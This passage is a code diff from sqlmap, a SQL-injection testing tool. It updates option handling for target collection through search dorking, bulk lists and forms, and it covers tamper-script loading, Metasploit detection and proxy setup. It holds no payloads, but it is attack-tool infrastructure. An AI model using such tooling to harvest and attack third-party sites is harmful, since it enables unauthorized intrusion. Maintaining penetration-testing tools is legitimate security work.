_adjustLoggingFormatter(): @@ -431,11 +281,12 @@ def _adjustLoggingFormatter(): return def format(record): - _ = boldifyMessage(FORMATTER._format(record)) - if kb.prependFlag: - _ = "\n%s" % _ + message = FORMATTER._format(record) + message = boldifyMessage(message) + if kb.get("prependFlag"): + message = "\n%s" % message kb.prependFlag = False - return _ + return message FORMATTER._format = FORMATTER.format FORMATTER.format = format @@ -446,82 +297,92 @@ def _setRequestFromFile(): textual file, parses it and saves the information into the knowledge base. 
""" - if not conf.requestFile: - return + if conf.requestFile: + for requestFile in re.split(PARAMETER_SPLITTING_REGEX, conf.requestFile): + requestFile = safeExpandUser(requestFile) + url = None + seen = set() - addedTargetUrls = set() + if not checkFile(requestFile, False): + errMsg = "specified HTTP request file '%s' " % requestFile + errMsg += "does not exist" + raise SqlmapFilePathException(errMsg) - conf.requestFile = os.path.expanduser(conf.requestFile) + infoMsg = "parsing HTTP request from '%s'" % requestFile + logger.info(infoMsg) - infoMsg = "parsing HTTP request from '%s'" % conf.requestFile - logger.info(infoMsg) + for target in parseRequestFile(requestFile): + url = target[0] + if url not in seen: + kb.targets.add(target) + if len(kb.targets) > 1: + conf.multipleTargets = True + seen.add(url) + + if url is None: + errMsg = "specified file '%s' " % requestFile + errMsg += "does not contain a usable HTTP request (with parameters)" + raise SqlmapDataException(errMsg) + + if conf.secondReq: + conf.secondReq = safeExpandUser(conf.secondReq) + + if not checkFile(conf.secondReq, False): + errMsg = "specified second-order HTTP request file '%s' " % conf.secondReq + errMsg += "does not exist" + raise SqlmapFilePathException(errMsg) - if not os.path.isfile(conf.requestFile): - errMsg = "the specified HTTP request file " - errMsg += "does not exist" - raise SqlmapFilePathException(errMsg) + infoMsg = "parsing second-order HTTP request from '%s'" % conf.secondReq + logger.info(infoMsg) - _feedTargetsDict(conf.requestFile, addedTargetUrls) + try: + target = next(parseRequestFile(conf.secondReq, False)) + kb.secondReq = target + except StopIteration: + errMsg = "specified second-order HTTP request file '%s' " % conf.secondReq + errMsg += "does not contain a valid HTTP request" + raise SqlmapDataException(errMsg) def _setCrawler(): if not conf.crawlDepth: return - crawl(conf.url) + if not conf.bulkFile: + if conf.url: + crawl(conf.url) + elif conf.requestFile and kb.targets: + target = next(iter(kb.targets)) + crawl(target[0], target[2], target[3]) -def _setGoogleDorking(): +def _doSearch(): """ - This function checks if the way to request testable hosts is through - Google dorking then requests to Google the search parameter, parses - the results and save the testable hosts into the knowledge base. + This function performs search dorking, parses results + and saves the testable hosts into the knowledge base. 
""" if not conf.googleDork: return - global keepAliveHandler - global proxyHandler - - debugMsg = "initializing Google dorking requests" - logger.debug(debugMsg) - - infoMsg = "first request to Google to get the session cookie" - logger.info(infoMsg) - - handlers = [proxyHandler] - - # Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec8.html - if conf.keepAlive: - if conf.proxy: - warnMsg = "persistent HTTP(s) connections, Keep-Alive, has " - warnMsg += "been disabled because of its incompatibility " - warnMsg += "with HTTP(s) proxy" - logger.warn(warnMsg) - else: - handlers.append(keepAliveHandler) - - googleObj = Google(handlers) kb.data.onlyGETs = None def retrieve(): - links = googleObj.search(conf.googleDork) + links = search(conf.googleDork) if not links: errMsg = "unable to find results for your " - errMsg += "Google dork expression" + errMsg += "search dork expression" raise SqlmapGenericException(errMsg) for link in links: link = urldecode(link) - if re.search(r"(.*?)\?(.+)", link): - kb.targets.add((link, conf.method, conf.data, conf.cookie)) + if re.search(r"(.*?)\?(.+)", link) or conf.forms: + kb.targets.add((link, conf.method, conf.data, conf.cookie, None)) elif re.search(URI_INJECTABLE_REGEX, link, re.I): - if kb.data.onlyGETs is None and conf.data is None: + if kb.data.onlyGETs is None and conf.data is None and not conf.googleDork: message = "do you want to scan only results containing GET parameters? [Y/n] " - test = readInput(message, default="Y") - kb.data.onlyGETs = test.lower() != 'n' - if not kb.data.onlyGETs: - kb.targets.add((link, conf.method, conf.data, conf.cookie)) + kb.data.onlyGETs = readInput(message, default='Y', boolean=True) + if not kb.data.onlyGETs or conf.googleDork: + kb.targets.add((link, conf.method, conf.data, conf.cookie, None)) return links @@ -529,47 +390,97 @@ def retrieve(): links = retrieve() if kb.targets: - infoMsg = "sqlmap got %d results for your " % len(links) - infoMsg += "Google dork expression, " + infoMsg = "found %d results for your " % len(links) + infoMsg += "search dork expression" - if len(links) == len(kb.targets): - infoMsg += "all " - else: - infoMsg += "%d " % len(kb.targets) + if not conf.forms: + infoMsg += ", " + + if len(links) == len(kb.targets): + infoMsg += "all " + else: + infoMsg += "%d " % len(kb.targets) + + infoMsg += "of them are testable targets" - infoMsg += "of them are testable targets" logger.info(infoMsg) break else: - message = "sqlmap got %d results " % len(links) - message += "for your Google dork expression, but none of them " + message = "found %d results " % len(links) + message += "for your search dork expression, but none of them " message += "have GET parameters to test for SQL injection. " message += "Do you want to skip to the next result page? 
[Y/n]" - test = readInput(message, default="Y") - if test[0] in ("n", "N"): + if not readInput(message, default='Y', boolean=True): raise SqlmapSilentQuitException else: conf.googlePage += 1 +def _setStdinPipeTargets(): + if conf.url: + return + + if isinstance(conf.stdinPipe, _collections.Iterable): + infoMsg = "using 'STDIN' for parsing targets list" + logger.info(infoMsg) + + class _(object): + def __init__(self): + self.__rest = OrderedSet() + + def __iter__(self): + return self + + def __next__(self): + return self.next() + + def next(self): + try: + line = next(conf.stdinPipe) + except (IOError, OSError, TypeError, UnicodeDecodeError): + line = None + + if line: + match = re.search(r"\b(https?://[^\s'\"]+|[\w.]+\.\w{2,3}[/\w+]*\?[^\s'\"]+)", line, re.I) + if match: + return (match.group(0), conf.method, conf.data, conf.cookie, None) + elif self.__rest: + return self.__rest.pop() + + raise StopIteration() + + def add(self, elem): + self.__rest.add(elem) + + kb.targets = _() + def _setBulkMultipleTargets(): if not conf.bulkFile: return - conf.bulkFile = os.path.expanduser(conf.bulkFile) + conf.bulkFile = safeExpandUser(conf.bulkFile) infoMsg = "parsing multiple targets list from '%s'" % conf.bulkFile logger.info(infoMsg) - if not os.path.isfile(conf.bulkFile): + if not checkFile(conf.bulkFile, False): errMsg = "the specified bulk file " errMsg += "does not exist" raise SqlmapFilePathException(errMsg) + found = False for line in getFileItems(conf.bulkFile): - if re.search(r"[^ ]+\?(.+)", line, re.I): - kb.targets.add((line.strip(), None, None, None)) + if conf.scope and not re.search(conf.scope, line, re.I): + continue + + if re.match(r"[^ ]+\?(.+)", line, re.I) or kb.customInjectionMark in line or conf.data: + found = True + kb.targets.add((line.strip(), conf.method, conf.data, conf.cookie, None)) + + if not found and not conf.forms and not conf.crawlDepth: + warnMsg = "no usable links found (with GET parameters)" + logger.warning(warnMsg) def _findPageForms(): if not conf.forms or conf.crawlDepth: @@ -578,27 +489,47 @@ def _findPageForms(): if conf.url and not checkConnection(): return + found = False infoMsg = "searching for forms" logger.info(infoMsg) - if not conf.bulkFile: - page, _ = Request.queryPage(content=True) - findPageForms(page, conf.url, True, True) + if not any((conf.bulkFile, conf.googleDork)): + page, _, _ = Request.queryPage(content=True, ignoreSecondOrder=True) + if findPageForms(page, conf.url, True, True): + found = True else: - targets = getFileItems(conf.bulkFile) + if conf.bulkFile: + targets = getFileItems(conf.bulkFile) + elif conf.googleDork: + targets = [_[0] for _ in kb.targets] + kb.targets.clear() + else: + targets = [] + for i in xrange(len(targets)): try: - target = targets[i] - page, _, _ = Request.getPage(url=target.strip(), crawling=True, raise404=False) - findPageForms(page, target, False, True) + target = targets[i].strip() + + if not re.search(r"(?i)\Ahttp[s]*://", target): + target = "http://%s" % target + + page, _, _ = Request.getPage(url=target.strip(), cookie=conf.cookie, crawling=True, raise404=False) + if findPageForms(page, target, False, True): + found = True if conf.verbose in (1, 2): status = '%d/%d links visited (%d%%)' % (i + 1, len(targets), round(100.0 * (i + 1) / len(targets))) dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True) - except Exception, ex: - errMsg = "problem occured while searching for forms at '%s' ('%s')" % (target, ex) + except KeyboardInterrupt: + break + except Exception as ex: + errMsg = 
"problem occurred while searching for forms at '%s' ('%s')" % (target, getSafeExString(ex)) logger.error(errMsg) + if not found: + warnMsg = "no forms found" + logger.warning(warnMsg) + def _setDBMSAuthentication(): """ Check and set the DBMS authentication credentials to run statements as @@ -611,7 +542,7 @@ def _setDBMSAuthentication(): debugMsg = "setting the DBMS authentication credentials" logger.debug(debugMsg) - match = re.search("^(.+?):(.*?)$", conf.dbmsCred) + match = re.search(r"^(.+?):(.*?)$", conf.dbmsCred) if not match: errMsg = "DBMS authentication credentials value must be in format " @@ -631,23 +562,20 @@ def _setMetasploit(): msfEnvPathExists = False if IS_WIN: - if not conf.msfPath: - def _(key, value): - retVal = None - - try: - from _winreg import ConnectRegistry, OpenKey, QueryValueEx, HKEY_LOCAL_MACHINE - _ = ConnectRegistry(None, HKEY_LOCAL_MACHINE) - _ = OpenKey(_, key) - retVal = QueryValueEx(_, value)[0] - except: - logger.debug("unable to identify Metasploit installation path via registry key") - - return retVal + try: + __import__("win32file") + except ImportError: + errMsg = "sqlmap requires third-party module 'pywin32' " + errMsg += "in order to use Metasploit functionalities on " + errMsg += "Windows. You can download it from " + errMsg += "'https://github.com/mhammond/pywin32'" + raise SqlmapMissingDependence(errMsg) - conf.msfPath = _(r"SOFTWARE\Rapid7\Metasploit", "Location") - if conf.msfPath: - conf.msfPath = os.path.join(conf.msfPath, "msf3") + if not conf.msfPath: + for candidate in os.environ.get("PATH", "").split(';'): + if all(_ in candidate for _ in ("metasploit", "bin")): + conf.msfPath = os.path.dirname(candidate.rstrip('\\')) + break if conf.osSmb: isAdmin = runningAsAdmin() @@ -661,8 +589,15 @@ def _(key, value): if conf.msfPath: for path in (conf.msfPath, os.path.join(conf.msfPath, "bin")): - if all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("", "msfcli", "msfconsole", "msfencode", "msfpayload")): + if any(os.path.exists(normalizePath(os.path.join(path, "%s%s" % (_, ".bat" if IS_WIN else "")))) for _ in ("msfcli", "msfconsole")): msfEnvPathExists = True + if all(os.path.exists(normalizePath(os.path.join(path, "%s%s" % (_, ".bat" if IS_WIN else "")))) for _ in ("msfvenom",)): + kb.oldMsf = False + elif all(os.path.exists(normalizePath(os.path.join(path, "%s%s" % (_, ".bat" if IS_WIN else "")))) for _ in ("msfencode", "msfpayload")): + kb.oldMsf = True + else: + msfEnvPathExists = False + conf.msfPath = path break @@ -677,54 +612,62 @@ def _(key, value): warnMsg += "or more of the needed Metasploit executables " warnMsg += "within msfcli, msfconsole, msfencode and " warnMsg += "msfpayload do not exist" - logger.warn(warnMsg) + logger.warning(warnMsg) else: warnMsg = "you did not provide the local path where Metasploit " warnMsg += "Framework is installed" - logger.warn(warnMsg) + logger.warning(warnMsg) if not msfEnvPathExists: warnMsg = "sqlmap is going to look for Metasploit Framework " warnMsg += "installation inside the environment path(s)" - logger.warn(warnMsg) + logger.warning(warnMsg) envPaths = os.environ.get("PATH", "").split(";" if IS_WIN else ":") for envPath in envPaths: envPath = envPath.replace(";", "") - if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("", "msfcli", "msfconsole", "msfencode", "msfpayload")): - infoMsg = "Metasploit Framework has been found " - infoMsg += "installed in the '%s' path" % envPath - logger.info(infoMsg) - + if 
any(os.path.exists(normalizePath(os.path.join(envPath, "%s%s" % (_, ".bat" if IS_WIN else "")))) for _ in ("msfcli", "msfconsole")): msfEnvPathExists = True - conf.msfPath = envPath + if all(os.path.exists(normalizePath(os.path.join(envPath, "%s%s" % (_, ".bat" if IS_WIN else "")))) for _ in ("msfvenom",)): + kb.oldMsf = False + elif all(os.path.exists(normalizePath(os.path.join(envPath, "%s%s" % (_, ".bat" if IS_WIN else "")))) for _ in ("msfencode", "msfpayload")): + kb.oldMsf = True + else: + msfEnvPathExists = False - break + if msfEnvPathExists: + infoMsg = "Metasploit Framework has been found " + infoMsg += "installed in the '%s' path" % envPath + logger.info(infoMsg) + + conf.msfPath = envPath + + break if not msfEnvPathExists: errMsg = "unable to locate Metasploit Framework installation. " - errMsg += "You can get it at 'http://www.metasploit.com/download/'" + errMsg += "You can get it at 'https://www.metasploit.com/download/'" raise SqlmapFilePathException(errMsg) def _setWriteFile(): - if not conf.wFile: + if not conf.fileWrite: return debugMsg = "setting the write file functionality" logger.debug(debugMsg) - if not os.path.exists(conf.wFile): - errMsg = "the provided local file '%s' does not exist" % conf.wFile + if not os.path.exists(conf.fileWrite): + errMsg = "the provided local file '%s' does not exist" % conf.fileWrite raise SqlmapFilePathException(errMsg) - if not conf.dFile: + if not conf.fileDest: errMsg = "you did not provide the back-end DBMS absolute path " - errMsg += "where you want to write the local file '%s'" % conf.wFile + errMsg += "where you want to write the local file '%s'" % conf.fileWrite raise SqlmapMissingMandatoryOptionException(errMsg) - conf.wFileType = getFileType(conf.wFile) + conf.fileWriteType = getFileType(conf.fileWrite) def _setOS(): """ @@ -753,10 +696,10 @@ def _setTechnique(): validTechniques = sorted(getPublicTypeMembers(PAYLOAD.TECHNIQUE), key=lambda x: x[1]) validLetters = [_[0][0].upper() for _ in validTechniques] - if conf.tech and isinstance(conf.tech, basestring): + if conf.technique and isinstance(conf.technique, six.string_types): _ = [] - for letter in conf.tech.upper(): + for letter in conf.technique.upper(): if letter not in validLetters: errMsg = "value for --technique must be a string composed " errMsg += "by the letters %s. Refer to the " % ", ".join(validLetters) @@ -768,7 +711,7 @@ def _setTechnique(): _.append(validInt) break - conf.tech = _ + conf.technique = _ def _setDBMS(): """ @@ -782,7 +725,7 @@ def _setDBMS(): logger.debug(debugMsg) conf.dbms = conf.dbms.lower() - regex = re.search("%s ([\d\.]+)" % ("(%s)" % "|".join([alias for alias in SUPPORTED_DBMS])), conf.dbms, re.I) + regex = re.search(r"%s ([\d\.]+)" % ("(%s)" % "|".join(SUPPORTED_DBMS)), conf.dbms, re.I) if regex: conf.dbms = regex.group(1) @@ -790,19 +733,33 @@ def _setDBMS(): if conf.dbms not in SUPPORTED_DBMS: errMsg = "you provided an unsupported back-end database management " - errMsg += "system. The supported DBMS are %s. " % ', '.join([d for d in DBMS_DICT]) + errMsg += "system. Supported DBMSes are as follows: %s. " % ', '.join(sorted((_ for _ in (list(DBMS_DICT) + getPublicTypeMembers(FORK, True))), key=str.lower)) errMsg += "If you do not know the back-end DBMS, do not provide " errMsg += "it and sqlmap will fingerprint it for you." 
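[Editor's aside] Both Metasploit branches above probe candidate directories for the console binaries, appending '.bat' on Windows and distinguishing the newer 'msfvenom' from the legacy 'msfencode'/'msfpayload' pair. A stripped-down sketch of that PATH-scanning idea, standard library only; the helper name is illustrative:

    import os

    IS_WIN = os.name == "nt"

    def find_msf_dir(names=("msfconsole", "msfcli")):
        suffix = ".bat" if IS_WIN else ""
        for directory in os.environ.get("PATH", "").split(os.pathsep):
            directory = directory.strip('"').rstrip(os.sep)
            if any(os.path.exists(os.path.join(directory, name + suffix)) for name in names):
                return directory   # first PATH entry containing a console binary
        return None

    msf_dir = find_msf_dir()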
raise SqlmapUnsupportedDBMSException(errMsg) - for aliases in (MSSQL_ALIASES, MYSQL_ALIASES, PGSQL_ALIASES, ORACLE_ALIASES, \ - SQLITE_ALIASES, ACCESS_ALIASES, FIREBIRD_ALIASES, \ - MAXDB_ALIASES, SYBASE_ALIASES, DB2_ALIASES): + for dbms, aliases in DBMS_ALIASES: if conf.dbms in aliases: - conf.dbms = aliases[0] + conf.dbms = dbms break +def _listTamperingFunctions(): + """ + Lists available tamper functions + """ + + if conf.listTampers: + infoMsg = "listing available tamper scripts\n" + logger.info(infoMsg) + + for script in sorted(glob.glob(os.path.join(paths.SQLMAP_TAMPER_PATH, "*.py"))): + content = openFile(script, 'r').read() + match = re.search(r'(?s)__priority__.+"""(.+)"""', content) + if match: + comment = match.group(1).strip() + dataToStdout("* %s - %s\n" % (setColor(os.path.basename(script), "yellow"), re.sub(r" *\n *", " ", comment.split("\n\n")[0].strip()))) + def _setTamperingFunctions(): """ Loads tampering functions from given script(s) @@ -814,32 +771,37 @@ def _setTamperingFunctions(): resolve_priorities = False priorities = [] - for tfile in re.split(PARAMETER_SPLITTING_REGEX, conf.tamper): + for script in re.split(PARAMETER_SPLITTING_REGEX, conf.tamper): found = False - tfile = tfile.strip() + path = safeFilepathEncode(paths.SQLMAP_TAMPER_PATH) + script = safeFilepathEncode(script.strip()) - if not tfile: - continue + try: + if not script: + continue - elif os.path.exists(os.path.join(paths.SQLMAP_TAMPER_PATH, tfile if tfile.endswith('.py') else "%s.py" % tfile)): - tfile = os.path.join(paths.SQLMAP_TAMPER_PATH, tfile if tfile.endswith('.py') else "%s.py" % tfile) + elif os.path.exists(os.path.join(path, script if script.endswith(".py") else "%s.py" % script)): + script = os.path.join(path, script if script.endswith(".py") else "%s.py" % script) - elif not os.path.exists(tfile): - errMsg = "tamper script '%s' does not exist" % tfile - raise SqlmapFilePathException(errMsg) + elif not os.path.exists(script): + errMsg = "tamper script '%s' does not exist" % script + raise SqlmapFilePathException(errMsg) - elif not tfile.endswith('.py'): - errMsg = "tamper script '%s' should have an extension '.py'" % tfile + elif not script.endswith(".py"): + errMsg = "tamper script '%s' should have an extension '.py'" % script + raise SqlmapSyntaxException(errMsg) + except UnicodeDecodeError: + errMsg = "invalid character provided in option '--tamper'" raise SqlmapSyntaxException(errMsg) - dirname, filename = os.path.split(tfile) + dirname, filename = os.path.split(script) dirname = os.path.abspath(dirname) - infoMsg = "loading tamper script '%s'" % filename[:-3] + infoMsg = "loading tamper module '%s'" % filename[:-3] logger.info(infoMsg) - if not os.path.exists(os.path.join(dirname, '__init__.py')): + if not os.path.exists(os.path.join(dirname, "__init__.py")): errMsg = "make sure that there is an empty file '__init__.py' " errMsg += "inside of tamper scripts directory '%s'" % dirname raise SqlmapGenericException(errMsg) @@ -848,30 +810,31 @@ def _setTamperingFunctions(): sys.path.insert(0, dirname) try: - module = __import__(filename[:-3]) - except ImportError, msg: - raise SqlmapSyntaxException("cannot import tamper script '%s' (%s)" % (filename[:-3], msg)) + module = __import__(safeFilepathEncode(filename[:-3])) + except Exception as ex: + raise SqlmapSyntaxException("cannot import tamper module '%s' (%s)" % (getUnicode(filename[:-3]), getSafeExString(ex))) - priority = PRIORITY.NORMAL if not hasattr(module, '__priority__') else module.__priority__ + priority = PRIORITY.NORMAL if 
not hasattr(module, "__priority__") else module.__priority__ + priority = priority if priority is not None else PRIORITY.LOWEST for name, function in inspect.getmembers(module, inspect.isfunction): - if name == "tamper": + if name == "tamper" and (hasattr(inspect, "signature") and all(_ in inspect.signature(function).parameters for _ in ("payload", "kwargs")) or inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs"): found = True kb.tamperFunctions.append(function) - function.func_name = module.__name__ + function.__name__ = module.__name__ if check_priority and priority > last_priority: - message = "it seems that you might have mixed " + message = "it appears that you might have mixed " message += "the order of tamper scripts. " message += "Do you want to auto resolve this? [Y/n/q] " - test = readInput(message, default="Y") + choice = readInput(message, default='Y').upper() - if not test or test[0] in ("y", "Y"): - resolve_priorities = True - elif test[0] in ("n", "N"): + if choice == 'N': resolve_priorities = False - elif test[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException + else: + resolve_priorities = True check_priority = False @@ -880,20 +843,188 @@ def _setTamperingFunctions(): break elif name == "dependencies": - function() + try: + function() + except Exception as ex: + errMsg = "error occurred while checking dependencies " + errMsg += "for tamper module '%s' ('%s')" % (getUnicode(filename[:-3]), getSafeExString(ex)) + raise SqlmapGenericException(errMsg) if not found: - errMsg = "missing function 'tamper(payload, headers)' " - errMsg += "in tamper script '%s'" % tfile + errMsg = "missing function 'tamper(payload, **kwargs)' " + errMsg += "in tamper script '%s'" % script raise SqlmapGenericException(errMsg) + if kb.tamperFunctions and len(kb.tamperFunctions) > 3: + warnMsg = "using too many tamper scripts is usually not " + warnMsg += "a good idea" + logger.warning(warnMsg) + if resolve_priorities and priorities: - priorities.sort(reverse=True) + priorities.sort(key=functools.cmp_to_key(lambda a, b: cmp(a[0], b[0])), reverse=True) kb.tamperFunctions = [] for _, function in priorities: kb.tamperFunctions.append(function) +def _setPreprocessFunctions(): + """ + Loads preprocess function(s) from given script(s) + """ + + if conf.preprocess: + for script in re.split(PARAMETER_SPLITTING_REGEX, conf.preprocess): + found = False + function = None + + script = safeFilepathEncode(script.strip()) + + try: + if not script: + continue + + if not os.path.exists(script): + errMsg = "preprocess script '%s' does not exist" % script + raise SqlmapFilePathException(errMsg) + + elif not script.endswith(".py"): + errMsg = "preprocess script '%s' should have an extension '.py'" % script + raise SqlmapSyntaxException(errMsg) + except UnicodeDecodeError: + errMsg = "invalid character provided in option '--preprocess'" + raise SqlmapSyntaxException(errMsg) + + dirname, filename = os.path.split(script) + dirname = os.path.abspath(dirname) + + infoMsg = "loading preprocess module '%s'" % filename[:-3] + logger.info(infoMsg) + + if not os.path.exists(os.path.join(dirname, "__init__.py")): + errMsg = "make sure that there is an empty file '__init__.py' " + errMsg += "inside of preprocess scripts directory '%s'" % dirname + raise SqlmapGenericException(errMsg) + + if dirname not in sys.path: + sys.path.insert(0, dirname) + + try: + module = __import__(safeFilepathEncode(filename[:-3])) + except Exception as ex: + raise SqlmapSyntaxException("cannot 
import preprocess module '%s' (%s)" % (getUnicode(filename[:-3]), getSafeExString(ex))) + + for name, function in inspect.getmembers(module, inspect.isfunction): + try: + if name == "preprocess" and inspect.getargspec(function).args and all(_ in inspect.getargspec(function).args for _ in ("req",)): + found = True + + kb.preprocessFunctions.append(function) + function.__name__ = module.__name__ + + break + except ValueError: # Note: https://github.com/sqlmapproject/sqlmap/issues/4357 + pass + + if not found: + errMsg = "missing function 'preprocess(req)' " + errMsg += "in preprocess script '%s'" % script + raise SqlmapGenericException(errMsg) + else: + try: + function(_urllib.request.Request("http://localhost")) + except Exception as ex: + tbMsg = traceback.format_exc() + + if conf.debug: + dataToStdout(tbMsg) + + handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.PREPROCESS, suffix=".py") + os.close(handle) + + openFile(filename, "w+").write("#!/usr/bin/env\n\ndef preprocess(req):\n pass\n") + openFile(os.path.join(os.path.dirname(filename), "__init__.py"), "w+").write("pass") + + errMsg = "function 'preprocess(req)' " + errMsg += "in preprocess script '%s' " % script + errMsg += "had issues in a test run ('%s'). " % getSafeExString(ex) + errMsg += "You can find a template script at '%s'" % filename + raise SqlmapGenericException(errMsg) + +def _setPostprocessFunctions(): + """ + Loads postprocess function(s) from given script(s) + """ + + if conf.postprocess: + for script in re.split(PARAMETER_SPLITTING_REGEX, conf.postprocess): + found = False + function = None + + script = safeFilepathEncode(script.strip()) + + try: + if not script: + continue + + if not os.path.exists(script): + errMsg = "postprocess script '%s' does not exist" % script + raise SqlmapFilePathException(errMsg) + + elif not script.endswith(".py"): + errMsg = "postprocess script '%s' should have an extension '.py'" % script + raise SqlmapSyntaxException(errMsg) + except UnicodeDecodeError: + errMsg = "invalid character provided in option '--postprocess'" + raise SqlmapSyntaxException(errMsg) + + dirname, filename = os.path.split(script) + dirname = os.path.abspath(dirname) + + infoMsg = "loading postprocess module '%s'" % filename[:-3] + logger.info(infoMsg) + + if not os.path.exists(os.path.join(dirname, "__init__.py")): + errMsg = "make sure that there is an empty file '__init__.py' " + errMsg += "inside of postprocess scripts directory '%s'" % dirname + raise SqlmapGenericException(errMsg) + + if dirname not in sys.path: + sys.path.insert(0, dirname) + + try: + module = __import__(safeFilepathEncode(filename[:-3])) + except Exception as ex: + raise SqlmapSyntaxException("cannot import postprocess module '%s' (%s)" % (getUnicode(filename[:-3]), getSafeExString(ex))) + + for name, function in inspect.getmembers(module, inspect.isfunction): + if name == "postprocess" and inspect.getargspec(function).args and all(_ in inspect.getargspec(function).args for _ in ("page", "headers", "code")): + found = True + + kb.postprocessFunctions.append(function) + function.__name__ = module.__name__ + + break + + if not found: + errMsg = "missing function 'postprocess(page, headers=None, code=None)' " + errMsg += "in postprocess script '%s'" % script + raise SqlmapGenericException(errMsg) + else: + try: + _, _, _ = function("", {}, None) + except: + handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.PREPROCESS, suffix=".py") + os.close(handle) + + openFile(filename, "w+").write("#!/usr/bin/env\n\ndef postprocess(page, 
headers=None, code=None):\n return page, headers, code\n") + openFile(os.path.join(os.path.dirname(filename), "__init__.py"), "w+").write("pass") + + errMsg = "function 'postprocess(page, headers=None, code=None)' " + errMsg += "in postprocess script '%s' " % script + errMsg += "should return a tuple '(page, headers, code)' " + errMsg += "(Note: find template script at '%s')" % filename + raise SqlmapGenericException(errMsg) + def _setThreads(): if not isinstance(conf.threads, int) or conf.threads <= 0: conf.threads = 1 @@ -904,90 +1035,282 @@ def _setDNSCache(): """ def _getaddrinfo(*args, **kwargs): - if args in kb.cache: - return kb.cache[args] + key = (args, frozenset(kwargs.items())) - else: - kb.cache[args] = socket._getaddrinfo(*args, **kwargs) - return kb.cache[args] + if key in kb.cache.addrinfo: + return kb.cache.addrinfo[key] - if not hasattr(socket, '_getaddrinfo'): + kb.cache.addrinfo[key] = socket._getaddrinfo(*args, **kwargs) + return kb.cache.addrinfo[key] + + if not hasattr(socket, "_getaddrinfo"): socket._getaddrinfo = socket.getaddrinfo socket.getaddrinfo = _getaddrinfo -def _setHTTPProxy(): +def _setSocketPreConnect(): """ - Check and set the HTTP proxy to pass by all HTTP requests. + Makes a pre-connect version of socket.create_connection """ - global proxyHandler + if conf.disablePrecon: + return - if not conf.proxy: - if conf.hostname in ('localhost', '127.0.0.1') or conf.ignoreProxy: - proxyHandler = urllib2.ProxyHandler({}) + def _thread(): + while kb.get("threadContinue") and not conf.get("disablePrecon"): + try: + with kb.locks.socket: + keys = list(socket._ready.keys()) + + for key in keys: + with kb.locks.socket: + q = socket._ready.get(key) + if q is None or len(q) >= SOCKET_PRE_CONNECT_QUEUE_SIZE: + continue + args = key[0] + kwargs = dict(key[1]) + + s = socket._create_connection(*args, **kwargs) + + with kb.locks.socket: + q = socket._ready.get(key) + if q is not None and len(q) < SOCKET_PRE_CONNECT_QUEUE_SIZE: + q.append((s, time.time())) + s = None + + if s is not None: + try: + s.close() + except: + pass + + except KeyboardInterrupt: + break + except: + pass + finally: + time.sleep(0.01) + + def create_connection(*args, **kwargs): + retVal = None + stale = [] + + key = (tuple(args), frozenset(kwargs.items())) + with kb.locks.socket: + if key not in socket._ready: + socket._ready[key] = collections.deque() + + q = socket._ready[key] + while len(q) > 0: + candidate, created = q.popleft() + if (time.time() - created) < PRECONNECT_CANDIDATE_TIMEOUT: + retVal = candidate + break + else: + stale.append(candidate) - return + for candidate in stale: + try: + candidate.shutdown(socket.SHUT_RDWR) + candidate.close() + except: + pass - debugMsg = "setting the HTTP/SOCKS proxy to pass by all HTTP requests" - logger.debug(debugMsg) + if not retVal: + retVal = socket._create_connection(*args, **kwargs) + else: + try: + retVal.settimeout(kwargs.get("timeout", socket.getdefaulttimeout())) + except: + pass - proxySplit = urlparse.urlsplit(conf.proxy) - hostnamePort = proxySplit.netloc.split(":") + return retVal - scheme = proxySplit.scheme.upper() - hostname = hostnamePort[0] - port = None - username = None - password = None + if not hasattr(socket, "_create_connection"): + socket._ready = {} + socket._create_connection = socket.create_connection + socket.create_connection = create_connection - if len(hostnamePort) == 2: - try: - port = int(hostnamePort[1]) - except: - pass # drops into the next check block + thread = threading.Thread(target=_thread) + setDaemon(thread) 
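[Editor's aside] _setDNSCache() above memoizes socket.getaddrinfo() by stashing the original function on the module and swapping in a caching wrapper, so repeated requests to the same host skip name resolution; _setSocketPreConnect() applies the same monkey-patching idea to socket.create_connection(). A minimal standalone version of the getaddrinfo patch, with a plain module-level dict standing in for sqlmap's kb cache:

    import socket

    _addrinfo_cache = {}

    def _cached_getaddrinfo(*args, **kwargs):
        key = (args, frozenset(kwargs.items()))
        if key not in _addrinfo_cache:
            _addrinfo_cache[key] = socket._original_getaddrinfo(*args, **kwargs)
        return _addrinfo_cache[key]

    if not hasattr(socket, "_original_getaddrinfo"):  # install the patch only once
        socket._original_getaddrinfo = socket.getaddrinfo
        socket.getaddrinfo = _cached_getaddrinfo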
+ thread.start() - if not all((scheme, hasattr(PROXY_TYPE, scheme), hostname, port)): - errMsg = "proxy value must be in format '(%s)://url:port'" % "|".join(_[0].lower() for _ in getPublicTypeMembers(PROXY_TYPE)) - raise SqlmapSyntaxException(errMsg) +def _setHTTPHandlers(): + """ + Check and set the HTTP/SOCKS proxy for all HTTP requests. + """ - if conf.pCred: - _ = re.search("^(.*?):(.*?)$", conf.pCred) - if not _: - errMsg = "Proxy authentication credentials " - errMsg += "value must be in format username:password" - raise SqlmapSyntaxException(errMsg) - else: - username = _.group(1) - password = _.group(2) + with kb.locks.handlers: + if conf.proxyList: + conf.proxy = conf.proxyList[0] + conf.proxyList = conf.proxyList[1:] + conf.proxyList[:1] - if scheme in (PROXY_TYPE.SOCKS4, PROXY_TYPE.SOCKS5): - socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if scheme == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, hostname, port, username=username, password=password) - socks.wrapmodule(urllib2) - else: - if conf.pCred: - # Reference: http://stackoverflow.com/questions/34079/how-to-specify-an-authenticated-proxy-for-a-python-http-connection - proxyString = "%s@" % conf.pCred - else: - proxyString = "" + if len(conf.proxyList) > 1: + infoMsg = "loading proxy '%s' from a supplied proxy list file" % conf.proxy + logger.info(infoMsg) + + elif not conf.proxy: + if conf.hostname in ("localhost", "127.0.0.1") or conf.ignoreProxy: + proxyHandler.proxies = {} - proxyString += "%s:%d" % (hostname, port) - proxyHandler = urllib2.ProxyHandler({"http": proxyString, "https": proxyString}) + if conf.proxy: + debugMsg = "setting the HTTP/SOCKS proxy for all HTTP requests" + 